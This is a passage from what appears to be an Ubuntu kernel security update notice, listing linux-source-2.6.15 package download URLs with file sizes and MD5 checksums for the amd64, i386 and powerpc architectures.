ee02cf55938734ac3fffe70f05873787\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:    38932 49dbd9c4e2e20c82bc4f72f96977fa76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb\n      Size/MD5:   278866 0022570a60186a7507cc6fc0c2a70523\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    18976 36010ccdc2c317ea1c8709c5acdde882\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    43490 5ad83aebd2f0ac43a9d7cf5cfe8578f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   105216 cb23bc0ca0bac966260f0b2578d0fdc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:     2284 8fa58a53434e18add295f31e34744f5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    34576 287fe266d7f5e52f9f20b316fae901b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    97046 bcc27695aa09eecab4c861d2e316001a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    37136 dad43b39afeea22f320027c2b569dadd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    44114 8414b8ea9d6e06f4266d04b9ef2d2976\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   167738 6d50d82ed633992aac2705d8dc00a8b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    33950 83316c8958735bc899e00a3e186c06d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   137966 f6e30ef9ea02fea6daf7ad82dbaa2511\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    46906 dbd091636aee1cceeddfa65bd6cc7fc9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   133162 8da4c9b8455249bc335da95c2cf8bbab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   273812 bbcb2b391def865054793f0e7e941bc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   102332 db46a2b60b21705f061be94e5d220689\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:  1597792 bd2e362f1f418b306ea21c41f61a141a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.83_i386.deb\n      Size/MD5:   859548 86afec448f148903d5748747ee95fb09\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.83_i386.deb\n      Size/MD5:   863906 bfe9f84581c53dd75a8f42722fac515c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.83_i386.deb\n      Size/MD5:   859510 096d2cc6f0135932edcc5db3f697f7f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.83_i386.deb\n      Size/MD5:   863096 66788665458ea9d7627d4dbbaa7a492d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.83_i386.deb\n      Size/MD5:   860094 2ec0549505550fe41b053a9d07b3e96d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_i386.deb\n      Size/MD5:  6917930 6800b5b9cef3dda9c18285fd0a5a0861\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.83_i386.deb\n      Size/MD5: 21723684 c77055baba2f8d0a0dca8c6b70efad7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.83_i386.deb\n      Size/MD5: 22515514 803d268b74de5fb125afa60774aa6f45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.83_i386.deb\n      Size/MD5: 22264222 89c3982ac0dbeb2a8c127cbba577b815\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.83_i386.deb\n      Size/MD5: 23626196 5778022e4579d673e07684c44bda3a08\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.83_i386.deb\n      Size/MD5: 23179348 1433bddfebc3d7ef9f00aedb14ebd3d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    15510 e62e57cfe09d188ebe01bc2ee45a845b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   238516 4a1995ef8bcfe107fc2e9b7465603dc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   197138 9dec44e8fdfc0abc95b95239b645fbec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:  1048388 fb0dad1c3a28730eaf12274f1c0dc7ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:  1741402 9377754754c4ed15a61342add3b761ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   160894 989c116529f339cfbacefe427bcab857\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:     9166 bd634de0afad877e63a228b31ddfd455\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    76464 af2b674b8516d183a2af8348cf316321\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    53548 1fd06459bb056b1e6f3a124b409bbd0c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    33052 b3173bcb2f075ee1eb21d4a4cabccc95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    85624 7b8b25edc1318186e444eb8fd5e81ad9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:     6024 252a0516364b72fc6941686bd28769a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:     8756 d94b79361dd2ed66d16ac819c1c94ac6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    53638 de31d0b1a2b3b3dd7bf0615aed25876b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   130964 7fcd54c609e5ffb089a95aad9f1f88ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    98466 0c43f5660cd5ac12cd714a9ed0e0b033\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    77212 f6089721f429c5e802844c61cbeccb91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:  1768820 24f785550385af62fb7fd494fb93718b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    69614 c353f4b826fe38081861b57aba7ac37c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    11768 154732744d766308a9a464ffa3fd3f59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    36104 d002dde7237ba687f850ff5a2b50d2fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   132672 d90c18be0a789b10180cb4f673f0fe57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:    38580 a6edf5554b10f7205e1fb33209c35119\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb\n      Size/MD5:   299158 28aeda82e3e1da5b8dd4ba0ef868e218\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    23734 ec1291df62b5863b32f3017851a81e28\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    26008 c01db7a3a547b1bdcf8a371a820b2c0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    49332 6eb8da45e82352422c66480f71604787\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    51536 625e679dd36a711bca39a4cbc90e8fbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:     2308 8685fcdae320537382f7d411c4a86664\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:     2480 dcd313dbd14b32a815c4df0b7b6452fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    40310 b01a7c8d355e6d30c251e7d3de99866f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    43846 ef5c07e2dde2ff1307dac768e5808d45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   112608 1e3932e245833083a76f94526030e901\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   120738 9eb06ed68ec2a70a8f83d9aecc15f6f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    40908 0ef58a6a45875405f11bf83414571158\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    45998 5f882ba7e3771c3ccb3c7b67aaaa2a28\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    29026 90d608dc3367f896aaeb7e417e177108\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    29894 00455b6770b18f76126c02366c1ad08d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   211402 fb4b8b8d4c8a5d175124ba9de9eac663\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   225186 a5b5629cb05cc254bf5d34c17dcb3607\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    45058 e8a510c7c4d13a3a0dc6c021de355c14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    40226 8c5c6321d98c1d22aa2afeb488d8604b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:     1938 812fc371865e06c40ffe21cd428f4e23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:     2200 0ca4433c68a907bb1648d1c0cf92ea56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    80766 67f2f7a3e60eb080cc252e27faf74ee4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    86136 6594a7883c1bcf959f6a76754c133e5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   111586 ebd34bcdd46c475eaad512286742a693\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   125754 0081e0be5986bb5c15587c3ed8352c86\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    53422 1ec2a52f88d867a44e6e2fe717bef1a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    58494 a776b62248889e90b9ce86dabd18c25e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   147964 b399103ca836328b5ec0d896c249b237\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   161906 4202603bd4c4beb2c5f63395e5ad8f22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   318416 0ddf80e3cf85f4732d7996b089f68a6c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   288016 3bc25cd75ffac001db2849cb08f1af5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   115866 14ff9f3cacbdc8095d4e09ec7a70bfef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   116546 c020d4c2020d6a0e052c1423d9f4180c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:  1924916 57ed953d69fc9bfa9c7fb8c59b384b9c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:  2449234 0db7e0aec50c892368ec422a8c1da333\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.83_powerpc.deb\n      Size/MD5:   867180 f742f8e5979e5de5d2d8e37f854a806e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.83_powerpc.deb\n      Size/MD5:   867214 872ddaf435c225d439c08d6113cdbfda\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.83_powerpc.deb\n      Size/MD5:   865694 d229cedb5c93e081be89bc7e04fc0c8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_powerpc.deb\n      Size/MD5:  6946534 92603435c82b4f894c21f7e175aec489\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.83_powerpc.deb\n      Size/MD5: 22782590 8e13360c04faaf46966a278dfef57034\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.83_powerpc.deb\n      Size/MD5: 23691818 50470b886e1f55d5955e90c757a5a4d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.83_powerpc.deb\n      Size/MD5: 22363868 e763ada478e4533b682453a87f5a3770\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    17782 6be85802b9a87505e792fa579929bbdd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    17388 0548ae129d2ae569639acd2b938cfb85\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   261370 863df84b1f2d45613f592f35d1ebc2bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   282626 1a2e54c3086200d3cce35248af64c196\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   227822 9207a4c3a085c12e9d62075f7317c287\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   248954 bed95a76e97bbf651a5428f6a3e2fb80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:  1048462 aee15879129edd8e22a467419ac37aac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:  1048610 7447ee7c55acc599ef1526f62e669dd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:  1738560 18ecf7032164f14682205b016d15b8d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:  1878122 ba6efcbf22b000733999dcbf8590cd00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   250838 b487dbfbcfef64ffd686e84e726f7b71\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   233534 66514cfa90f1dd6321d1f0129bd0be57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    13058 fccb534fe7a64a8b4def0f682df56fce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    13534 ada9543aa5c43f633f14ec7b13f6469e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    84796 4bb08b5db785cddd88eddb2e79c025dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    52202 830b5e30c9dd36d2c97a3a55a301278a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    73932 17c3114d93e0b583f6dff69216cebb49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    85856 17b2bcb8ada779a950802685fc3fb64c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:     6622 6971cd578cce9f5eb3f1a04c603ff65c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:     7058 ce77da679a26e33626fa964f1975e76b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    60388 ecdda4f3d42ebdbc12817e98064e4999\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    70420 8fa61246180e8ff9e62f2a803759170f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   128550 6eec93cdc294f2d6ffba5a9223263802\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   157946 e76776fe480bfce17c1d01866f330374\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   108174 7243abdaa18ba8889a25e6a1d0b0ed3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   126130 863746f220320dfc89053b27a4314959\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    87300 bc9467d403b372cad5f96dc9f52afdfa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    93362 ca42dec74d7f34698bb93b215f7dc0d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:  2014776 e75ecd960831dfe1d50e44dc8aef61c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:  1988694 b35b5cf288687032dcf2340ef6022aaa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   104132 abd991111eec9c4b98c572247b3e7827\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   115806 8e032a1273787c5440f458b565d68d08\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    12744 e145eb648c1d659c783a2a9fd4238ac4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    14448 8c8b9229a9dd6d5593a49511d269c937\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    39954 00eb5f12014f4a170c07f74cdbd1092f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:    41542 3a1576cf7f596cb63c1284e1371923ff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb\n      Size/MD5:   149352 0f36cbc9a57808fe61f5d45513c2c379\n    